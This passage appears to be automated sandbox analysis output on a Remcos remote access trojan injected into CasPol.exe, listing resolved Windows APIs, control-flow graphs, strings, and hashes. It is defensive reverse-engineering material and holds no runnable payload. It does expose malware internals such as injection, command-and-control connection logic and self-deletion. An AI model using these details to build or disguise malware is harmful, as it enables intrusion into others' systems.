                                                                                                                      • GetModuleHandleA.KERNEL32(Kernel32,GetProcessImageFileNameW,?,?,?,?,0040D783), ref: 0041BD28
                                                                                                                      • GetProcAddress.KERNEL32(00000000), ref: 0041BD2B
                                                                                                                      • LoadLibraryA.KERNEL32(shcore,SetProcessDpiAwareness,?,?,?,?,0040D783), ref: 0041BD3D
                                                                                                                      • GetProcAddress.KERNEL32(00000000), ref: 0041BD40
                                                                                                                      • LoadLibraryA.KERNEL32(user32,SetProcessDpiAwareness,?,?,?,?,0040D783), ref: 0041BD51
                                                                                                                      • GetProcAddress.KERNEL32(00000000), ref: 0041BD54
                                                                                                                      • LoadLibraryA.KERNEL32(ntdll,NtUnmapViewOfSection,?,?,?,?,0040D783), ref: 0041BD65
                                                                                                                      • GetProcAddress.KERNEL32(00000000), ref: 0041BD68
                                                                                                                      • LoadLibraryA.KERNEL32(kernel32,GlobalMemoryStatusEx,?,?,?,?,0040D783), ref: 0041BD75
                                                                                                                      • GetProcAddress.KERNEL32(00000000), ref: 0041BD78
                                                                                                                      • GetModuleHandleA.KERNEL32(kernel32,IsWow64Process,?,?,?,?,0040D783), ref: 0041BD85
                                                                                                                      • GetProcAddress.KERNEL32(00000000), ref: 0041BD88
                                                                                                                      • GetModuleHandleA.KERNEL32(kernel32,GetComputerNameExW,?,?,?,?,0040D783), ref: 0041BD95
                                                                                                                      • GetProcAddress.KERNEL32(00000000), ref: 0041BD98
                                                                                                                      • LoadLibraryA.KERNEL32(Shell32,IsUserAnAdmin,?,?,?,?,0040D783), ref: 0041BDA9
                                                                                                                      • GetProcAddress.KERNEL32(00000000), ref: 0041BDAC
                                                                                                                      • GetModuleHandleA.KERNEL32(kernel32,SetProcessDEPPolicy,?,?,?,?,0040D783), ref: 0041BDB9
                                                                                                                      • GetProcAddress.KERNEL32(00000000), ref: 0041BDBC
                                                                                                                      • GetModuleHandleA.KERNEL32(user32,EnumDisplayDevicesW,?,?,?,?,0040D783), ref: 0041BDCD
                                                                                                                      • GetProcAddress.KERNEL32(00000000), ref: 0041BDD0
                                                                                                                      • GetModuleHandleA.KERNEL32(user32,EnumDisplayMonitors,?,?,?,?,0040D783), ref: 0041BDE1
                                                                                                                      • GetProcAddress.KERNEL32(00000000), ref: 0041BDE4
                                                                                                                      • GetModuleHandleA.KERNEL32(user32,GetMonitorInfoW,?,?,?,?,0040D783), ref: 0041BDF5
                                                                                                                      • GetProcAddress.KERNEL32(00000000), ref: 0041BDF8
                                                                                                                      • GetModuleHandleA.KERNEL32(kernel32,GetSystemTimes,?,?,?,?,0040D783), ref: 0041BE05
                                                                                                                      • GetProcAddress.KERNEL32(00000000), ref: 0041BE08
                                                                                                                      • LoadLibraryA.KERNEL32(Shlwapi,0000000C,?,?,?,?,0040D783), ref: 0041BE16
                                                                                                                      • GetProcAddress.KERNEL32(00000000), ref: 0041BE19
                                                                                                                      • LoadLibraryA.KERNEL32(kernel32,GetConsoleWindow,?,?,?,?,0040D783), ref: 0041BE26
                                                                                                                      • GetProcAddress.KERNEL32(00000000), ref: 0041BE29
                                                                                                                      • GetModuleHandleA.KERNEL32(ntdll,NtSuspendProcess,?,?,?,?,0040D783), ref: 0041BE3B
                                                                                                                      • GetProcAddress.KERNEL32(00000000), ref: 0041BE3E
                                                                                                                      • GetModuleHandleA.KERNEL32(ntdll,NtResumeProcess,?,?,?,?,0040D783), ref: 0041BE4B
                                                                                                                      • GetProcAddress.KERNEL32(00000000), ref: 0041BE4E
                                                                                                                      • LoadLibraryA.KERNELBASE(Iphlpapi,GetExtendedTcpTable,?,?,?,?,0040D783), ref: 0041BE60
                                                                                                                      • GetProcAddress.KERNEL32(00000000), ref: 0041BE63
                                                                                                                      • LoadLibraryA.KERNEL32(Iphlpapi,GetExtendedUdpTable,?,?,?,?,0040D783), ref: 0041BE70
                                                                                                                      • GetProcAddress.KERNEL32(00000000), ref: 0041BE73
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 0000000C.00000002.4558010842.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: AddressProc$HandleLibraryLoadModule
                                                                                                                      • String ID: EnumDisplayDevicesW$EnumDisplayMonitors$GetComputerNameExW$GetConsoleWindow$GetExtendedTcpTable$GetExtendedUdpTable$GetMonitorInfoW$GetProcessImageFileNameW$GetSystemTimes$GlobalMemoryStatusEx$Iphlpapi$IsUserAnAdmin$IsWow64Process$Kernel32$NtResumeProcess$NtSuspendProcess$NtUnmapViewOfSection$Psapi$SetProcessDEPPolicy$SetProcessDpiAwareness$Shell32$Shlwapi$kernel32$ntdll$shcore$user32
                                                                                                                      • API String ID: 384173800-625181639
                                                                                                                      • Opcode ID: 0789f4e3f810de028ed60e0db8f6a6efc83e65cfda48e5b03c752fe52fb7e632
                                                                                                                      • Instruction ID: 9dbe04c74af77a7e1246f7e7b4568b240d3cb110e698a9ec5713b860520f9e80
                                                                                                                      • Opcode Fuzzy Hash: 0789f4e3f810de028ed60e0db8f6a6efc83e65cfda48e5b03c752fe52fb7e632
                                                                                                                      • Instruction Fuzzy Hash: EC31EEA0E4031C7ADA107FB69C49E5B7E9CD940B953110827B508D3162FB7DA980DEEE

                                                                                                                      Control-flow Graph

                                                                                                                      APIs
                                                                                                                        • Part of subcall function 004124B7: RegOpenKeyExA.KERNELBASE(80000001,00000000,00000000,00020019,?), ref: 004124D7
                                                                                                                        • Part of subcall function 004124B7: RegQueryValueExA.KERNELBASE(?,?,00000000,00000000,00000000,?,004742F8), ref: 004124F5
                                                                                                                        • Part of subcall function 004124B7: RegCloseKey.KERNELBASE(?), ref: 00412500
                                                                                                                      • Sleep.KERNELBASE(00000BB8), ref: 0040E603
                                                                                                                      • ExitProcess.KERNEL32 ref: 0040E672
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 0000000C.00000002.4558010842.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: CloseExitOpenProcessQuerySleepValue
                                                                                                                      • String ID: 5.3.0 Pro$override$pth_unenc$BG
                                                                                                                      • API String ID: 2281282204-3981147832
                                                                                                                      • Opcode ID: 099a9bf13a86a18ae7ced4af45115ec220a16a2a1b66786f925988895ab02a01
                                                                                                                      • Instruction ID: 5cf4e9032f47a3efac01ff8ef37086889acd92013af90c8396a8a4e29292548f
                                                                                                                      • Opcode Fuzzy Hash: 099a9bf13a86a18ae7ced4af45115ec220a16a2a1b66786f925988895ab02a01
                                                                                                                      • Instruction Fuzzy Hash: 7B21A131B0031027C608767A891BA6F359A9B91719F90443EF805A72D7EE7D8A6083DF

                                                                                                                      Control-flow Graph

                                                                                                                      • Executed
                                                                                                                      • Not Executed
                                                                                                                      control_flow_graph 1179 404915-404924 1180 4049b1 1179->1180 1181 40492a-404931 1179->1181 1182 4049b3-4049b7 1180->1182 1183 404933-404937 1181->1183 1184 404939-404940 1181->1184 1185 404987-4049af CreateEventA CreateThread 1183->1185 1184->1185 1186 404942-404982 GetLocalTime call 41ad56 call 404c9e call 401f66 call 41a696 call 401eea 1184->1186 1185->1182 1186->1185
                                                                                                                      APIs
                                                                                                                      • GetLocalTime.KERNEL32(?), ref: 00404946
                                                                                                                      • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 00404994
                                                                                                                      • CreateThread.KERNELBASE(00000000,00000000,Function_00004B1D,?,00000000,00000000), ref: 004049A7
                                                                                                                      Strings
                                                                                                                      • KeepAlive | Enabled | Timeout: , xrefs: 0040495C
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 0000000C.00000002.4558010842.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: Create$EventLocalThreadTime
                                                                                                                      • String ID: KeepAlive | Enabled | Timeout:
                                                                                                                      • API String ID: 2532271599-1507639952
                                                                                                                      • Opcode ID: d248886e52a7d0ac6cae50da1f59772ac17be00107f66e41d9b0c0522851940d
                                                                                                                      • Instruction ID: b3b3bd05b27f7402d17ec3e4b95caf04d044377deb2a76ff13a13b362c137b93
                                                                                                                      • Opcode Fuzzy Hash: d248886e52a7d0ac6cae50da1f59772ac17be00107f66e41d9b0c0522851940d
                                                                                                                      • Instruction Fuzzy Hash: C2113AB19042543AC710A7BA8C09BCB7FAC9F86364F04407BF50462192D7789845CBFA
                                                                                                                      APIs
                                                                                                                      • CryptAcquireContextA.ADVAPI32(?,00000000,00000000,00000001,F0000000,?,00000001,004326D2,00000024,?,?,?), ref: 0043295C
                                                                                                                      • CryptGenRandom.ADVAPI32(?,?,?,?,?,?,?,?,?,0042CBCE,?), ref: 00432972
                                                                                                                      • CryptReleaseContext.ADVAPI32(?,00000000,?,?,?,?,?,?,0042CBCE,?), ref: 00432984
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 0000000C.00000002.4558010842.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: Crypt$Context$AcquireRandomRelease
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 1815803762-0
                                                                                                                      • Opcode ID: 04772303a0a25dfd0b8e93efaf4bd4cd6a07a437a7117abaa9b2762516ca9460
                                                                                                                      • Instruction ID: 265e42ecfadf18463eab4f7c57cd3d944434f2f899047e0b797dffc1cacfdca9
                                                                                                                      • Opcode Fuzzy Hash: 04772303a0a25dfd0b8e93efaf4bd4cd6a07a437a7117abaa9b2762516ca9460
                                                                                                                      • Instruction Fuzzy Hash: 06E06531318311BBEB310E21BC08F577AE4AF89B72F650A3AF251E40E4D2A288019A1C
                                                                                                                      APIs
                                                                                                                      • GetComputerNameExW.KERNELBASE(00000001,?,0000002B,00474358), ref: 0041A7CF
                                                                                                                      • GetUserNameW.ADVAPI32(?,0040DFC3), ref: 0041A7E7
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 0000000C.00000002.4558010842.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: Name$ComputerUser
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 4229901323-0
                                                                                                                      • Opcode ID: f3e21b17a5d8a19e2687fa05b240d0301e1fcdfe38c042d63901ddde5ca2efef
                                                                                                                      • Instruction ID: 0a408ea7b536296bc4698588bf682dce528bd2697060893402f21fe22c13e40a
                                                                                                                      • Opcode Fuzzy Hash: f3e21b17a5d8a19e2687fa05b240d0301e1fcdfe38c042d63901ddde5ca2efef
                                                                                                                      • Instruction Fuzzy Hash: 8801FF7290011CAADB14EB90DC45ADDBBBCEF44715F10017AB501B21D5EFB4AB898A98

                                                                                                                      Control-flow Graph

                                                                                                                      • Executed
                                                                                                                      • Not Executed
                                                                                                                      control_flow_graph 5 40d767-40d7e9 call 41bcf3 GetModuleFileNameW call 40e168 call 401fbd * 2 call 41afd3 call 40e8bd call 401d8c call 43e830 22 40d835-40d8fd call 401d64 call 401e8f call 401d64 call 404cbf call 405ce6 call 401eef call 401eea * 2 call 401d64 call 401ebd call 40541d call 401d64 call 404bb1 call 401d64 call 404bb1 5->22 23 40d7eb-40d830 call 40e986 call 401d64 call 401e8f call 40fcba call 40e937 call 40e155 5->23 69 40d950-40d96b call 401d64 call 40b125 22->69 70 40d8ff-40d94a call 4085b4 call 401eef call 401eea call 401e8f call 4124b7 22->70 49 40dc96-40dca7 call 401eea 23->49 79 40d9a5-40d9ac call 40bed7 69->79 80 40d96d-40d98c call 401e8f call 4124b7 69->80 70->69 102 40e134-40e154 call 401e8f call 412902 call 4112b5 70->102 90 40d9b5-40d9bc 79->90 91 40d9ae-40d9b0 79->91 80->79 98 40d98e-40d9a4 call 401e8f call 412902 80->98 93 40d9c0-40d9cc call 41a473 90->93 94 40d9be 90->94 92 40dc95 91->92 92->49 103 40d9d5-40d9d9 93->103 104 40d9ce-40d9d0 93->104 94->93 98->79 107 40da18-40da2b call 401d64 call 401e8f 103->107 108 40d9db call 40697b 103->108 104->103 128 40da32-40daba call 401d64 call 41ae18 call 401e18 call 401e13 call 401d64 call 401e8f call 401d64 call 401e8f call 401d64 call 401e8f call 401d64 call 401e8f 107->128 129 40da2d call 4069ba 107->129 117 40d9e0-40d9e2 108->117 120 40d9e4-40d9e9 call 40699d call 4064d0 117->120 121 40d9ee-40da01 call 401d64 call 401e8f 117->121 120->121 121->107 138 40da03-40da09 121->138 163 40db22-40db26 128->163 164 40dabc-40dad5 call 401d64 call 401e8f call 43a621 128->164 129->128 138->107 140 40da0b-40da11 138->140 140->107 142 40da13 call 4064d0 140->142 142->107 165 40dcaa-40dd01 call 436060 call 4022f8 call 401e8f * 2 call 41265d call 4082d7 163->165 166 40db2c-40db33 163->166 164->163 188 40dad7-40db1d call 401d64 call 401e8f call 401d64 call 401e8f call 40c89e call 401e18 call 401e13 164->188 219 40dd06-40dd5c call 401d64 call 401e8f call 401f66 call 401e8f call 4126d2 call 401d64 call 401e8f call 43a5f7 165->219 168 40dbb1-40dbbb call 4082d7 166->168 169 40db35-40dbaf call 401d64 call 401e8f call 401d64 call 401e8f call 401d64 call 401e8f call 401d64 call 401e8f call 401d64 call 401e8f call 40bc67 166->169 178 40dbc0-40dbe4 call 4022f8 call 4338d8 168->178 169->178 196 40dbf3 178->196 197 40dbe6-40dbf1 call 436060 178->197 188->163 202 40dbf5-40dc40 call 401e07 call 43e359 call 4022f8 call 401e8f call 4022f8 call 401e8f call 4128a2 196->202 197->202 257 40dc45-40dc6a call 4338e1 call 401d64 call 40b125 202->257 272 40dd79-40dd7b 219->272 273 40dd5e 219->273 257->219 274 40dc70-40dc91 call 401d64 call 41ae18 call 40e219 257->274 276 40dd81 272->276 277 40dd7d-40dd7f 272->277 275 40dd60-40dd77 call 41bec0 CreateThread 273->275 274->219 291 40dc93 274->291 280 40dd87-40de66 call 401f66 * 2 call 41a696 call 401d64 call 401e8f call 401d64 call 401e8f call 401d64 call 401e8f call 43a5f7 call 401d64 call 401e8f call 401d64 call 401e8f call 401d64 call 401e8f call 401d64 call 401e8f StrToIntA call 409517 call 401d64 call 401e8f 275->280 276->280 277->275 330 40dea1 280->330 331 40de68-40de9f call 43361d call 401d64 call 401e8f CreateThread 280->331 291->92 333 40dea3-40debb call 401d64 call 401e8f 330->333 331->333 342 40def9-40df0c call 401d64 call 401e8f 333->342 343 40debd-40def4 call 43361d call 401d64 call 401e8f CreateThread 333->343 354 40df6c-40df7f call 401d64 call 401e8f 342->354 355 40df0e-40df67 call 401d64 call 401e8f call 401d64 call 401e8f call 40c854 call 401e18 call 401e13 CreateThread 342->355 343->342 365 40df81-40dfb5 call 401d64 call 401e8f call 401d64 call 401e8f call 43a5f7 call 40b95c 354->365 366 40dfba-40dfde call 41a7b2 call 401e18 call 401e13 354->366 355->354 365->366 386 40dfe0-40dfe1 SetProcessDEPPolicy 366->386 387 40dfe3-40dff6 CreateThread 366->387 386->387 390 40e004-40e00b 387->390 391 40dff8-40e002 CreateThread 387->391 394 40e019-40e020 390->394 395 40e00d-40e017 CreateThread 390->395 391->390 398 40e022-40e025 394->398 399 40e033-40e038 394->399 395->394 401 40e073-40e08e call 401e8f call 41246e 398->401 402 40e027-40e031 398->402 404 40e03d-40e06e call 401f66 call 404c9e call 401f66 call 41a696 call 401eea 399->404 414 40e094-40e0d4 call 41ae18 call 401e07 call 412584 call 401e13 call 401e07 401->414 415 40e12a-40e12f call 40cbac call 413fd4 401->415 402->404 404->401 433 40e0ed-40e0f2 DeleteFileW 414->433 415->102 434 40e0f4-40e125 call 41ae18 call 401e07 call 41297a call 401e13 * 2 433->434 435 40e0d6-40e0d9 433->435 434->415 435->434 436 40e0db-40e0e8 Sleep call 401e07 435->436 436->433
                                                                                                                      APIs
                                                                                                                        • Part of subcall function 0041BCF3: LoadLibraryA.KERNELBASE(Psapi,GetProcessImageFileNameW,?,?,?,?,0040D783), ref: 0041BD08
                                                                                                                        • Part of subcall function 0041BCF3: GetProcAddress.KERNEL32(00000000), ref: 0041BD11
                                                                                                                        • Part of subcall function 0041BCF3: GetModuleHandleA.KERNEL32(Kernel32,GetProcessImageFileNameW,?,?,?,?,0040D783), ref: 0041BD28
                                                                                                                        • Part of subcall function 0041BCF3: GetProcAddress.KERNEL32(00000000), ref: 0041BD2B
                                                                                                                        • Part of subcall function 0041BCF3: LoadLibraryA.KERNEL32(shcore,SetProcessDpiAwareness,?,?,?,?,0040D783), ref: 0041BD3D
                                                                                                                        • Part of subcall function 0041BCF3: GetProcAddress.KERNEL32(00000000), ref: 0041BD40
                                                                                                                        • Part of subcall function 0041BCF3: LoadLibraryA.KERNEL32(user32,SetProcessDpiAwareness,?,?,?,?,0040D783), ref: 0041BD51
                                                                                                                        • Part of subcall function 0041BCF3: GetProcAddress.KERNEL32(00000000), ref: 0041BD54
                                                                                                                        • Part of subcall function 0041BCF3: LoadLibraryA.KERNEL32(ntdll,NtUnmapViewOfSection,?,?,?,?,0040D783), ref: 0041BD65
                                                                                                                        • Part of subcall function 0041BCF3: GetProcAddress.KERNEL32(00000000), ref: 0041BD68
                                                                                                                        • Part of subcall function 0041BCF3: LoadLibraryA.KERNEL32(kernel32,GlobalMemoryStatusEx,?,?,?,?,0040D783), ref: 0041BD75
                                                                                                                        • Part of subcall function 0041BCF3: GetProcAddress.KERNEL32(00000000), ref: 0041BD78
                                                                                                                        • Part of subcall function 0041BCF3: GetModuleHandleA.KERNEL32(kernel32,IsWow64Process,?,?,?,?,0040D783), ref: 0041BD85
                                                                                                                        • Part of subcall function 0041BCF3: GetProcAddress.KERNEL32(00000000), ref: 0041BD88
                                                                                                                        • Part of subcall function 0041BCF3: GetModuleHandleA.KERNEL32(kernel32,GetComputerNameExW,?,?,?,?,0040D783), ref: 0041BD95
                                                                                                                        • Part of subcall function 0041BCF3: GetProcAddress.KERNEL32(00000000), ref: 0041BD98
                                                                                                                        • Part of subcall function 0041BCF3: LoadLibraryA.KERNEL32(Shell32,IsUserAnAdmin,?,?,?,?,0040D783), ref: 0041BDA9
                                                                                                                        • Part of subcall function 0041BCF3: GetProcAddress.KERNEL32(00000000), ref: 0041BDAC
                                                                                                                        • Part of subcall function 0041BCF3: GetModuleHandleA.KERNEL32(kernel32,SetProcessDEPPolicy,?,?,?,?,0040D783), ref: 0041BDB9
                                                                                                                        • Part of subcall function 0041BCF3: GetProcAddress.KERNEL32(00000000), ref: 0041BDBC
                                                                                                                        • Part of subcall function 0041BCF3: GetModuleHandleA.KERNEL32(user32,EnumDisplayDevicesW,?,?,?,?,0040D783), ref: 0041BDCD
                                                                                                                        • Part of subcall function 0041BCF3: GetProcAddress.KERNEL32(00000000), ref: 0041BDD0
                                                                                                                        • Part of subcall function 0041BCF3: GetModuleHandleA.KERNEL32(user32,EnumDisplayMonitors,?,?,?,?,0040D783), ref: 0041BDE1
                                                                                                                        • Part of subcall function 0041BCF3: GetProcAddress.KERNEL32(00000000), ref: 0041BDE4
                                                                                                                        • Part of subcall function 0041BCF3: GetModuleHandleA.KERNEL32(user32,GetMonitorInfoW,?,?,?,?,0040D783), ref: 0041BDF5
                                                                                                                        • Part of subcall function 0041BCF3: GetProcAddress.KERNEL32(00000000), ref: 0041BDF8
                                                                                                                        • Part of subcall function 0041BCF3: GetModuleHandleA.KERNEL32(kernel32,GetSystemTimes,?,?,?,?,0040D783), ref: 0041BE05
                                                                                                                        • Part of subcall function 0041BCF3: GetProcAddress.KERNEL32(00000000), ref: 0041BE08
                                                                                                                        • Part of subcall function 0041BCF3: LoadLibraryA.KERNEL32(Shlwapi,0000000C,?,?,?,?,0040D783), ref: 0041BE16
                                                                                                                      • GetModuleFileNameW.KERNEL32(00000000,C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe,00000104), ref: 0040D790
                                                                                                                        • Part of subcall function 0040FCBA: __EH_prolog.LIBCMT ref: 0040FCBF
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 0000000C.00000002.4558010842.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: AddressProc$Module$Handle$LibraryLoad$FileH_prologName
                                                                                                                      • String ID: (CG$(CG$0DG$@CG$@CG$Access Level: $Administrator$C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe$Exe$Inj$Remcos Agent initialized$Software\$User$XCG$XCG$XCG$XCG$XCG$XCG$XCG$XCG$XCG$XCG$XCG$XCG$XCG$XCG$XCG$XCG$`=G$dCG$del$del$exepath$licence$license_code.txt$BG$BG$BG$BG$BG
                                                                                                                      • API String ID: 2830904901-3665108517
                                                                                                                      • Opcode ID: ec2fbce8c8fdecfb6bd1c00b52c4f5e2366ed6cef1538e238a09c4e97fe47ccc
                                                                                                                      • Instruction ID: 3e021a1a4b13f59cbd2257f1e4af8b1458c06fff599f70b9144805750af3581d
                                                                                                                      • Opcode Fuzzy Hash: ec2fbce8c8fdecfb6bd1c00b52c4f5e2366ed6cef1538e238a09c4e97fe47ccc
                                                                                                                      • Instruction Fuzzy Hash: 31329260B043406ADA18B776DC57BBE269A8FC1748F04443FB8467B2E2DE7C9D45839E

                                                                                                                      Control-flow Graph

                                                                                                                      • Executed
                                                                                                                      • Not Executed
                                                                                                                      control_flow_graph 447 413fd4-41401f call 401faa call 41aa83 call 401faa call 401d64 call 401e8f call 43a5f7 460 414021-414028 Sleep 447->460 461 41402e-41407c call 401f66 call 401d64 call 401fbd call 41afd3 call 404262 call 401d64 call 40b125 447->461 460->461 476 4140f0-41418a call 401f66 call 401d64 call 401fbd call 41afd3 call 401d64 * 2 call 4085b4 call 4027cb call 401eef call 401eea * 2 call 401d64 call 405422 461->476 477 41407e-4140ed call 401d64 call 4022f8 call 401d64 call 401e8f call 401d64 call 4022f8 call 401d64 call 401e8f call 401d64 call 4022f8 call 401d64 call 401e8f call 404101 461->477 530 41419a-4141a1 476->530 531 41418c-414198 476->531 477->476 532 4141a6-414242 call 40541d call 404cbf call 405ce6 call 4027cb call 401f66 call 41a696 call 401eea * 2 call 401d64 call 401e8f call 401d64 call 401e8f call 413f9a 530->532 531->532 559 414244-41428a WSAGetLastError call 41bc86 call 404c9e call 401f66 call 41a696 call 401eea 532->559 560 41428f-41429d call 4041f1 532->560 581 414b54-414b66 call 4047eb call 4020b4 559->581 565 4142ca-4142d8 call 404915 call 40428c 560->565 566 41429f-4142c5 call 401f66 * 2 call 41a696 560->566 577 4142dd-4142df 565->577 566->581 580 4142e5-414432 call 401d64 * 2 call 404cbf call 405ce6 call 4027cb call 405ce6 call 4027cb call 401f66 call 41a696 call 401eea * 4 call 41a97d call 413683 call 4082dc call 440c61 call 401d64 call 401fbd call 4022f8 call 401e8f * 2 call 41265d 577->580 577->581 647 414434-414441 call 40541d 580->647 648 414446-41446d call 401e8f call 412513 580->648 596 414b68-414b88 call 401d64 call 401e8f call 43a5f7 Sleep 581->596 597 414b8e-414b96 call 401d8c 581->597 596->597 597->476 647->648 654 414474-414ac7 call 403b40 call 40cbf1 call 41adfe call 41aed8 call 41ad56 call 401d64 GetTickCount call 41ad56 call 41acb0 call 41ad56 * 2 call 41ac62 call 41aed8 * 5 call 40e679 call 41aed8 call 4027ec call 40275c call 4027cb call 40275c call 4027cb * 3 call 40275c call 4027cb call 405ce6 call 4027cb call 405ce6 call 4027cb call 40275c call 4027cb call 40275c call 4027cb call 40275c call 4027cb call 40275c call 4027cb call 40275c call 4027cb call 40275c call 4027cb call 40275c call 4027cb call 405ce6 call 4027cb * 5 call 40275c call 4027cb call 40275c call 4027cb * 7 call 40275c call 404468 call 401eea * 50 call 401e13 call 401eea * 6 call 401e13 call 4045d5 648->654 655 41446f-414471 648->655 901 414ac9-414ad0 654->901 902 414adb-414ae2 654->902 655->654 901->902 903 414ad2-414ad4 901->903 904 414ae4-414ae9 call 40a767 902->904 905 414aee-414b20 call 405415 call 401f66 * 2 call 41a696 902->905 903->902 904->905 916 414b22-414b2e CreateThread 905->916 917 414b34-414b4f call 401eea * 2 call 401e13 905->917 916->917 917->581
                                                                                                                      APIs
                                                                                                                      • Sleep.KERNEL32(00000000,00000029,004742F8,?,00000000), ref: 00414028
                                                                                                                      • WSAGetLastError.WS2_32 ref: 00414249
                                                                                                                      • Sleep.KERNELBASE(00000000,00000002), ref: 00414B88
                                                                                                                        • Part of subcall function 0041A696: GetLocalTime.KERNEL32(00000000), ref: 0041A6B0
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 0000000C.00000002.4558010842.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: Sleep$ErrorLastLocalTime
                                                                                                                      • String ID: | $%I64u$5.3.0 Pro$@CG$C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe$Connected | $Connecting | $Connection Error: $Connection Error: Unable to create socket$Disconnected$TLS Off$TLS On $XCG$XCG$XCG$`=G$dCG$hlight$name$>G$>G$BG
                                                                                                                      • API String ID: 524882891-2450167416
                                                                                                                      • Opcode ID: 572c934186da3d0baa6f804f271fc78f46c3b558fbe77c50dea129d850f64105
                                                                                                                      • Instruction ID: 1c0fcd5d2769b0c1ed3f5537d8c306574ebe830810c6f13c8178cbf41d879861
                                                                                                                      • Opcode Fuzzy Hash: 572c934186da3d0baa6f804f271fc78f46c3b558fbe77c50dea129d850f64105
                                                                                                                      • Instruction Fuzzy Hash: 3B525E31A001145ADB18F771DDA6AEE73A59F90708F1041BFB80A771E2EF385E85CA9D

                                                                                                                      Control-flow Graph

                                                                                                                      APIs
                                                                                                                      • connect.WS2_32(?,?,?), ref: 004042A5
                                                                                                                      • CreateEventW.KERNEL32(00000000,00000000,00000001,00000000,?,?,?,0040192B), ref: 004043CB
                                                                                                                      • CreateEventW.KERNEL32(00000000,00000000,00000001,00000000,?,?,?,0040192B), ref: 004043D5
                                                                                                                      • WSAGetLastError.WS2_32(?,?,?,0040192B), ref: 004043E7
                                                                                                                        • Part of subcall function 0041A696: GetLocalTime.KERNEL32(00000000), ref: 0041A6B0
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 0000000C.00000002.4558010842.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: CreateEvent$ErrorLastLocalTimeconnect
                                                                                                                      • String ID: Connection Failed: $Connection Refused$TLS Authentication Failed$TLS Error 1$TLS Error 2$TLS Error 3$TLS Handshake... |
                                                                                                                      • API String ID: 994465650-2151626615
                                                                                                                      • Opcode ID: 2601ad7ba584dd83cc4b687a7b2e5622e4b8e2ffaa9cdc4205b416171ec1cd63
                                                                                                                      • Instruction ID: feeaa4dc0a5480c3be004408dd81f6e2390fe6c9429734df96c13844dfc6b1ca
                                                                                                                      • Opcode Fuzzy Hash: 2601ad7ba584dd83cc4b687a7b2e5622e4b8e2ffaa9cdc4205b416171ec1cd63
                                                                                                                      • Instruction Fuzzy Hash: 3E4116B1B002026BCB04B77A8C4B66E7A55AB81354B40016FE901676D3FE79AD6087DF

                                                                                                                      Control-flow Graph

                                                                                                                      APIs
                                                                                                                      • WaitForSingleObject.KERNEL32(?,000000FF,?,?,?,00000000,?,00404B8E,?,?,?,00404B26), ref: 004047FD
                                                                                                                      • SetEvent.KERNEL32(?,?,?,?,00000000,?,00404B8E,?,?,?,00404B26), ref: 00404808
                                                                                                                      • CloseHandle.KERNEL32(?,?,?,?,00000000,?,00404B8E,?,?,?,00404B26), ref: 00404811
                                                                                                                      • closesocket.WS2_32(000000FF), ref: 0040481F
                                                                                                                      • WaitForSingleObject.KERNEL32(?,000000FF,?,?,?,00000000,?,00404B8E,?,?,?,00404B26), ref: 00404856
                                                                                                                      • SetEvent.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 00404867
                                                                                                                      • WaitForSingleObject.KERNEL32(?,000000FF,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0040486E
                                                                                                                      • SetEvent.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00404880
                                                                                                                      • CloseHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00404885
